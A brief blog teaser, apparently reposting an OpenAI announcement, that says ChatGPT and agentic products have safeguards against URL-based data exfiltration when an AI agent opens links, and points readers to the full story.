Keeping your data safe when an AI agent clicks a link
- lastmansurfing
- 11 hours ago
- 1 min read

AI systems are getting better at taking actions on your behalf, opening a web page, following a link, or loading an image to help answer a question. These useful capabilities also introduce subtle risks that we work tirelessly to mitigate.
This post explains one specific class of attacks we defend against: URL-based data exfiltration, and how we’ve built safeguards to reduce the risk when ChatGPT (and agentic experiences) retrieve web content.
Read the full story | OpenAI



